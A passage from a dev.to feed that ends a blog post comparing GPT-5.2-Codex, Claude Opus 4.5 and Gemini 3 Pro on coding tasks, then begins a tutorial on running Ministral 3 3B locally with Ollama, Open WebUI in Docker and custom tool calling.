&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7junvt7jb8wulyvnwnce.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7junvt7jb8wulyvnwnce.png" alt="claude opus 4.5 token usage to finish a task"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  Gemini 3 Pro
&lt;/h4&gt;

&lt;p&gt;Gemini 3 got it working, but it's clearly not on the same level as GPT-5.2 High or Claude Opus 4.5. The UI it built is fine and totally usable, but it feels a bit barebones, and you don't get many choices in the palette compared to the other two.&lt;/p&gt;

&lt;p&gt;One clear miss is that language switching does not show up inside the action palette at all, which makes the i18n support feel incomplete even though translations technically exist.&lt;/p&gt;

&lt;p&gt;Here's the demo:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/2jxnkna5OmA"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/07d46534f0f3e2523ddc2f3e4c814795" rel="noopener noreferrer"&gt;Gemini 3 Pro Code&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; Low (helped significantly by cache reads)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; ~10 minutes 49 seconds (API Time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; +428 lines, -65 lines&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Token Usage:&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Input:&lt;/strong&gt; ~79k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cache Reads:&lt;/strong&gt; ~536k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output:&lt;/strong&gt; ~10.7k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Savings:&lt;/strong&gt; ~87% of input tokens served from cache&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
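&lt;p&gt;That savings figure checks out with quick arithmetic on the numbers above: cache reads divided by total input-side tokens.&lt;/p&gt;

```shell
# Sanity-check the "~87% served from cache" figure, using the rounded
# token counts reported in the run above.
cache_reads=536000   # ~536k tokens read from cache
fresh_input=79000    # ~79k fresh input tokens
pct=$(( cache_reads * 100 / (cache_reads + fresh_input) ))
echo "${pct}% of input-side tokens served from cache"
```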

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuzef5ujwyq1f5o19e7dg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuzef5ujwyq1f5o19e7dg.png" alt="gemini 3 pro token usage to finish a task"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Overall, Gemini 3 lands in a very clear third place here. It works, the UI looks fine, and nothing is completely broken, but compared to the depth, completeness, and polish of GPT-5.2 High and Claude Opus 4.5, it feels behind.&lt;/p&gt;
&lt;h3&gt;
  
  
  Test 2: Tool Usage Analytics + Insights Dashboard
&lt;/h3&gt;

&lt;p&gt;This test is a step up from the action palette.&lt;/p&gt;

&lt;p&gt;You can find the prompt I've used here: &lt;a href="https://gist.github.com/shricodev/637b453d206554b78eabd38fa159084d" rel="noopener noreferrer"&gt;Prompt&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  GPT-5.2-Codex (high)
&lt;/h4&gt;

&lt;p&gt;GPT-5.2 absolutely nailed this one.&lt;/p&gt;

&lt;p&gt;The final result turned out amazing. Tool usage tracking works exactly as expected, data persists correctly, and the dashboard feels like a real product feature. Most used tools, recent usage, filters, everything just works.&lt;/p&gt;

&lt;p&gt;One really nice touch is that it also wired analytics-related actions into the Action Palette from Test 1.&lt;/p&gt;

&lt;p&gt;It did take a bit longer than the first test, around 26 minutes, but again, that’s the trade-off with high reasoning. You can tell the model spent time thinking through data modeling, reuse, and avoiding duplicated logic. Totally worth it here.&lt;/p&gt;

&lt;p&gt;Here’s the demo:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/8RUeWl_09nY"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/b89de0278911b289d941b8129df69d66" rel="noopener noreferrer"&gt;GPT-5.2 High Code&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; ~$1.1–1.2&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; ~26 minutes (API time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; Large multi-file update, cleanly structured&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Token Usage:&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Total:&lt;/strong&gt; ~236k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Input:&lt;/strong&gt; ~162k (+ heavy cached context)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output:&lt;/strong&gt; ~75k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reasoning tokens:&lt;/strong&gt; ~57k&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;GPT-5.2 High continues to be slow but extremely powerful, and for a task like this, that’s a very good trade.&lt;/p&gt;
&lt;h4&gt;
  
  
  Claude Opus 4.5
&lt;/h4&gt;

&lt;p&gt;Claude Opus 4.5 did great here as well.&lt;/p&gt;

&lt;p&gt;The final implementation works end to end, and honestly, from a pure UI and feature standpoint, it’s hard to tell the difference between this and GPT-5.2 High. The dashboard looks clean, the data makes sense, and the filters work as expected.&lt;/p&gt;

&lt;p&gt;Here’s the demo:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/-npHfTxicF4"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/934c3841101c073b50a5dad18746d78d" rel="noopener noreferrer"&gt;Claude Opus 4.5 Code&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; $1.78&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; ~8 minutes (API Time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; +1,279 lines, -17 lines&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;
  
  
  Gemini 3 Pro
&lt;/h4&gt;

&lt;p&gt;Gemini 3 Pro gets the job done, but it clearly takes a more minimal approach than GPT-5.2 High and Claude Opus 4.5.&lt;/p&gt;

&lt;p&gt;As a result, the overall experience feels bare-bones. The UI is functional but plain, and the dashboard lacks the polish and depth you get from the other two models.&lt;/p&gt;

&lt;p&gt;It also didn't wire an action to open the analytics dashboard into the action palette, the way the other two models did.&lt;/p&gt;

&lt;p&gt;Here’s the demo:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/JuQjYnY-XGE"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;You can find the code it generated here: &lt;a href="https://gist.github.com/shricodev/cd2ceb9d4a6a1f53abd274cd1efc89ba" rel="noopener noreferrer"&gt;Gemini 3 Pro Code&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cost:&lt;/strong&gt; Low, with heavy cache utilization&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Duration:&lt;/strong&gt; ~5 minutes (API Time)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code Changes:&lt;/strong&gt; +351 lines, -3 lines&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Token Usage:&lt;/strong&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Input:&lt;/strong&gt; ~67k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Output:&lt;/strong&gt; ~7.1k&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Savings:&lt;/strong&gt; ~85%+ input tokens served from cache&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Overall, Gemini 3 Pro remains efficient and reliable, but in a comparison like this, efficiency alone is not enough. 🤷‍♂️&lt;/p&gt;


&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;From this test at least, I can conclude that these models are now pretty much able to one-shot reasonably complex work.&lt;/p&gt;

&lt;p&gt;Still, there have been times when the models messed up so badly that fixing the problems one by one would have taken me nearly as long as building the whole thing from scratch.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkxv5kpey20fduyyqrh3e.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkxv5kpey20fduyyqrh3e.gif" alt="dog sideeye gif"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If I compare the results across models, Opus 4.5 definitely takes the crown. But I still don’t think we’re anywhere close to relying on it for real, big production projects. The recent improvements are honestly insane, but the results still don’t fully back them up.&lt;/p&gt;

&lt;p&gt;For now, I think these models are great for refactoring, planning, and helping you move faster. But if you solely rely on their generated code, the codebase just won’t hold up long term.&lt;/p&gt;

&lt;p&gt;I don't see any of these recent models as “use it and ship it” ready for production in a project with millions of lines of code, at least not in the way people hype them up.&lt;/p&gt;

&lt;p&gt;Let me know your thoughts in the comments.&lt;/p&gt;

&lt;div class="ltag__user ltag__user__id__1127015"&gt;
    &lt;a href="/shricodev" class="ltag__user__link profile-image-link"&gt;
      &lt;div class="ltag__user__pic"&gt;
        &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1127015%2F1c5e48a2-f602-4e7d-8312-3c0322d155c6.jpg" alt="shricodev image"&gt;
      &lt;/div&gt;
    &lt;/a&gt;
  &lt;div class="ltag__user__content"&gt;
    &lt;h2&gt;
&lt;a class="ltag__user__link" href="/shricodev"&gt;Shrijal Acharya&lt;/a&gt;Follow
&lt;/h2&gt;
    &lt;div class="ltag__user__summary"&gt;
      &lt;a class="ltag__user__link" href="/shricodev"&gt;Full Stack SDE • Open-Source Contributor • Collaborator @Oppia • Mail for collaboration&lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;





</description>
      <category>webdev</category>
      <category>programming</category>
      <category>javascript</category>
      <category>ai</category>
    </item>
    <item>
      <title>Ministral 3 3B Local Setup Guide with MCP Tool Calling 🔥</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Wed, 24 Dec 2025 16:26:00 +0000</pubDate>
      <link>https://dev.to/composiodev/ministral-3-3b-local-setup-guide-with-mcp-tool-calling-icm</link>
      <guid>https://dev.to/composiodev/ministral-3-3b-local-setup-guide-with-mcp-tool-calling-icm</guid>
      <description>&lt;p&gt;Everyone’s talking about Ministral 3 3B, so I wanted to see what the hype is about. 🤨&lt;/p&gt;

&lt;p&gt;Let's test it properly. We’ll start with the fun part and run it directly in the browser using WebGPU, fully local.&lt;/p&gt;

&lt;p&gt;Then we’ll switch to the practical setup and run a quantized version with Ollama, plug it into Open WebUI, and test real tool calling. First with small local Python tools, then with remote MCP tools via Composio.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fezz2omw7gxn6etpvh9fj.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fezz2omw7gxn6etpvh9fj.gif" alt="Shocked GIF"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We will cover a few specs and then move on to practical tests, so let's jump in.&lt;/p&gt;




&lt;h2&gt;
  
  
  What’s Covered?
&lt;/h2&gt;

&lt;p&gt;In this hands-on guide, you’ll learn about the Ministral 3 3B model, how to run it locally, and how to get it to perform &lt;strong&gt;real tool calls&lt;/strong&gt; using Open WebUI, first with local tools and then with &lt;strong&gt;remote MCP tools via Composio&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What you will learn: ✨&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;What makes Ministral 3 3B special&lt;/li&gt;
&lt;li&gt;How to run the model locally using Ollama (including pulling a quantized variant)&lt;/li&gt;
&lt;li&gt;How to launch Open WebUI using Docker and connect it to Ollama&lt;/li&gt;
&lt;li&gt;How to add and test local Python tools inside Open WebUI&lt;/li&gt;
&lt;li&gt;How to work with remotely hosted MCP tools in Open WebUI&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;⚠️ &lt;strong&gt;NOTE:&lt;/strong&gt; This isn’t a benchmark post. The idea is to show a practical setup for running a small local model with real tools, then extending it with remote MCP servers.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  What's so Special?
&lt;/h2&gt;

&lt;p&gt;Ministral 3 3B is the smallest and most efficient model in the Ministral 3 family. Mistral 3 includes three state-of-the-art small dense models: 14B, 8B, and 3B, along with Mistral Large 3, which is the most capable model to date from Mistral. All models in this family are open source under the Apache 2.0 license, which means you can fine-tune and use them commercially for free.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvb1w71afsm49cogmvamz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvb1w71afsm49cogmvamz.png" alt="Ministral 3 3B base benchmark"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;But the topic of our talk is the &lt;strong&gt;Ministral 3 3B model&lt;/strong&gt;. At such a small size, it comes with function calling, structured output, vision capabilities, and most importantly, it is one of the first multimodal models capable of running &lt;strong&gt;completely locally&lt;/strong&gt; in the browser with WebGPU support.&lt;/p&gt;

&lt;p&gt;As Mistral puts it, this model is both compact and powerful. It is specially designed for edge deployment, offering insanely high speed and the ability to run completely locally even on fairly old or low-end hardware.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1b5y1mbj6yq1o1y2jgry.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1b5y1mbj6yq1o1y2jgry.png" alt="Ministral 3 3B claim"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here is the model’s token context window and pricing.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Token Context Window:&lt;/strong&gt; It comes with a 256K token context window, which is impressive for a model of this size. For reference, the recent Claude Opus 4.5 model, which is built specifically for agentic coding, comes with a 200K token context window.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Pricing:&lt;/strong&gt; Because it is open source, you can access it for free by running it locally. If you use it through the Mistral playground, pricing starts at $0.1 per million input tokens and $0.1 per million output tokens, which is almost negligible. It honestly feels like the pricing is there just for formality.&lt;/li&gt;
&lt;/ul&gt;
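&lt;p&gt;To put that in perspective, here's a quick back-of-the-envelope sketch of what those rates work out to (the token counts are made-up example numbers):&lt;/p&gt;

```python
# Ministral 3 3B playground pricing quoted above:
# $0.1 per million input tokens, $0.1 per million output tokens.
PRICE_PER_M_INPUT = 0.1
PRICE_PER_M_OUTPUT = 0.1

def estimate_cost(input_tokens: int, output_tokens: int) -> float:
    """Estimated cost in dollars for the given token usage."""
    return (input_tokens / 1_000_000) * PRICE_PER_M_INPUT + (
        output_tokens / 1_000_000
    ) * PRICE_PER_M_OUTPUT

# A fairly heavy workload, 5M input and 1M output tokens, still costs well under a dollar:
print(f"${estimate_cost(5_000_000, 1_000_000):.2f}")  # → $0.60
```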

&lt;p&gt;Besides its decent context window and fully open-source nature, these are the major features of Ministral 3 3B.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Vision:&lt;/strong&gt; Enables the model to analyze images and provide insights based on visual content, in addition to text.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Multilingual:&lt;/strong&gt; Supports dozens of languages, including English, French, Spanish, German, and more.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Agentic:&lt;/strong&gt; Offers strong agentic capabilities with native function calling and JSON output, which we will cover shortly.&lt;/li&gt;
&lt;/ul&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Local:&lt;/strong&gt; Runs completely locally in your browser with WebGPU support.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Here is a small demo of the model running directly in the browser:&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/p8i06eO5rOs"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;

&lt;p&gt;To actually get a feel for running a model locally in the browser, head over to this Hugging Face Space: &lt;a href="https://huggingface.co/spaces/mistralai/Ministral_3B_WebGPU" rel="noopener noreferrer"&gt;mistralai/Ministral_3B_WebGPU&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;NOTE:&lt;/strong&gt; For most users, this will work out of the box, but some may encounter an error if WebGPU is not enabled or supported in their browser. Make sure WebGPU is enabled based on the browser you are using.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;When you load it, the model files, roughly 3GB, are downloaded into your browser cache, and the model runs 100 percent locally with WebGPU acceleration. It is powered by &lt;a href="https://huggingface.co/docs/transformers.js/en/index" rel="noopener noreferrer"&gt;Transformers.js&lt;/a&gt;, and all prompts are handled directly in the browser. No remote requests are made. Everything happens locally.&lt;/p&gt;

&lt;p&gt;How cool is that? You can run a capable multimodal model entirely inside your browser, with no server involved.&lt;/p&gt;




&lt;h2&gt;
  
  
  Running Ministral 3 3B Locally
&lt;/h2&gt;

&lt;p&gt;In the above example, you see how the model does such an amazing job with vision capabilities (live video classification). Now let's see how good this model is at making tool calls. We will test it by running the model locally on our system.&lt;/p&gt;

&lt;p&gt;For this, there are generally two recommended approaches:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;vLLM&lt;/strong&gt;: Easy, fast, and cheap LLM serving for everyone.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Good old Ollama&lt;/strong&gt;: Chat &amp;amp; build with open models.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You can go with either option. Generally speaking, vLLM is the easier one to get started with, and that's what I'd suggest, but...&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6szsqilyrylxfqp4fqby.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6szsqilyrylxfqp4fqby.png" alt="CUDA out of memory"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I kept hitting a CUDA out-of-memory error, so I went with Ollama and a quantized model instead. I have had a great experience with Ollama so far, and the quantized model is good enough for our demo.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 1: Install Ollama and Docker
&lt;/h3&gt;

&lt;p&gt;If you don't have Ollama installed already, install it on your system by following the documentation here: &lt;a href="https://ollama.com/download" rel="noopener noreferrer"&gt;Ollama Installation Guide&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;It's not compulsory, but we will run Open WebUI in a Docker container, so if you plan to follow along, make sure you have Docker installed.&lt;/p&gt;

&lt;p&gt;You can find the Docker installation guide here: &lt;a href="https://docs.docker.com/engine/install/" rel="noopener noreferrer"&gt;Docker Installation&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 2: Download Ministral 3 3B Model and Start Ollama
&lt;/h3&gt;

&lt;p&gt;Now that you have Ollama installed and Docker running, let's download the &lt;a href="https://ollama.com/library/ministral-3:3b" rel="noopener noreferrer"&gt;Ministral 3 3B model&lt;/a&gt; and start Ollama.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ollama pull ministral-3:3b
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;⚠️ &lt;strong&gt;CAUTION&lt;/strong&gt;: If you don't have sufficient VRAM (video RAM) and decent specs on your system, your system might catch fire when running the model. 🫠&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;If so, go with the quantized model instead as I did.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ollama pull ministral-3:3b-instruct-2512-q4_K_M
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now, start the Ollama server with the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ollama serve
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Once the model is downloaded and the server is running, you can quickly test it in the terminal itself.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ollama run ministral-3:3b-instruct-2512-q4_K_M &lt;span class="s2"&gt;"Which came first, the chicken or the egg?"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you get a response, you are good to go.&lt;/p&gt;
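&lt;p&gt;As a side note, if you'd rather hit the model from code than the CLI, Ollama also exposes a local REST API on port 11434. Here's a minimal Python sketch using only the standard library (the model name and prompt are just examples, and the commented-out call requires the server to be running):&lt;/p&gt;

```python
import json
import urllib.request

OLLAMA_URL = "http://127.0.0.1:11434/api/generate"

def build_payload(model: str, prompt: str) -> dict:
    # stream=False tells Ollama to return a single JSON object
    # instead of streaming newline-delimited chunks.
    return {"model": model, "prompt": prompt, "stream": False}

def ask(model: str, prompt: str) -> str:
    """Send a prompt to the local Ollama server and return the reply text."""
    req = urllib.request.Request(
        OLLAMA_URL,
        data=json.dumps(build_payload(model, prompt)).encode(),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read())["response"]

# Example (requires `ollama serve` to be running locally):
# print(ask("ministral-3:3b-instruct-2512-q4_K_M", "Say hi in one word."))
```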

&lt;h3&gt;
  
  
  Step 3: Run Open WebUI
&lt;/h3&gt;

&lt;p&gt;To just talk with the model, the CLI chat with &lt;code&gt;ollama run&lt;/code&gt; works perfectly, but we need to add some custom tools to our model.&lt;/p&gt;

&lt;p&gt;For that, the easiest way is through Open WebUI.&lt;/p&gt;

&lt;p&gt;Download and run Open WebUI with the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="nt"&gt;--network&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;host &lt;span class="se"&gt;\&lt;/span&gt;
            &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;OLLAMA_BASE_URL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;http://127.0.0.1:11434 &lt;span class="se"&gt;\&lt;/span&gt;
            &lt;span class="nt"&gt;-v&lt;/span&gt; open-webui:/app/backend/data &lt;span class="se"&gt;\&lt;/span&gt;
            &lt;span class="nt"&gt;--name&lt;/span&gt; open-webui &lt;span class="nt"&gt;--restart&lt;/span&gt; always &lt;span class="se"&gt;\&lt;/span&gt;
            ghcr.io/open-webui/open-webui:main
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That command starts &lt;strong&gt;Open WebUI&lt;/strong&gt; in Docker and sets it up to talk with the local Ollama server we just started with the &lt;code&gt;ollama serve&lt;/code&gt; command.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;docker run -d&lt;/code&gt; runs the container in the background (detached).&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;--network=host&lt;/code&gt; puts the container on the host network, so it can reach services on your machine using &lt;code&gt;127.0.0.1&lt;/code&gt; (localhost).&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;-e OLLAMA_BASE_URL=http://127.0.0.1:11434&lt;/code&gt; tells Open WebUI where your Ollama server is.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;-v open-webui:/app/backend/data&lt;/code&gt; creates a persistent Docker volume so your Open WebUI chat history persists.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;--name open-webui&lt;/code&gt; names the container.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;--restart always&lt;/code&gt; makes it auto-start again after reboots or crashes.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;ghcr.io/open-webui/open-webui:main&lt;/code&gt; is the image being run (the &lt;code&gt;main&lt;/code&gt; tag).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To see if it all worked well, run this command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker ps
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you see a container with the name &lt;code&gt;open-webui&lt;/code&gt; and the status &lt;code&gt;Up&lt;/code&gt;, you are good to go, and you can now safely visit: &lt;code&gt;http://localhost:8080&lt;/code&gt; to view the WebUI.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 4: Add Custom Tools for Function Calling
&lt;/h3&gt;

&lt;p&gt;Once you're in, you should see the new model &lt;code&gt;ministral-3:3b-instruct-2512&lt;/code&gt; in the list of models. Now, let's add our custom tools.&lt;/p&gt;

&lt;p&gt;First, let's test it with local tools, which are smaller Python functions that the model can call.&lt;/p&gt;

&lt;p&gt;Head over to the Workspace tab in the left sidebar, and in the Tools section, click on the "+ New Tool" button, and paste the following code: &lt;a href="https://gist.github.com/shricodev/422b04f2eac96c77a3210adaea1a1a9c" rel="noopener noreferrer"&gt;Local Tools&lt;/a&gt;&lt;/p&gt;
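&lt;p&gt;For reference, an Open WebUI local tool is just a Python class named &lt;code&gt;Tools&lt;/code&gt; whose typed, docstring-annotated methods get exposed to the model. Here's a minimal sketch (the &lt;code&gt;add_numbers&lt;/code&gt; tool is an illustrative example, not necessarily the exact code in the gist):&lt;/p&gt;

```python
class Tools:
    """Open WebUI exposes each public method on this class as a tool.
    The type hints and docstrings are used to build the schema the
    model sees, so keep them accurate and descriptive."""

    def add_numbers(self, a: int, b: int) -> int:
        """
        Add two numbers together and return the sum.
        :param a: The first number.
        :param b: The second number.
        """
        return a + b
```

&lt;p&gt;The docstring-based schema is what helps a small 3B model reliably pick the right tool, so it pays to be descriptive.&lt;/p&gt;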

